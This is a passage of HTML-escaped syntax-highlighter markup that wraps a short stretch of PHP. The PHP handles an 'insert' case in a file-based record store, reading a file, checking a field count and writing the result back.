&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-67&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$chk&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;==&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error3&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-68&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;break&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-69&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&amp;nbsp;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-70&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;case&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;insert&quot;&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-71&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbGetPath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$table&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-72&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;!&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error4&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-73&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbReadFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-74&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-cn&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 153, 153) !important;&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;!=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Error5&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a7b199319094-75&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;count&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$query&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a7b199319094-76&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;		&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbWriteFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$result&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; 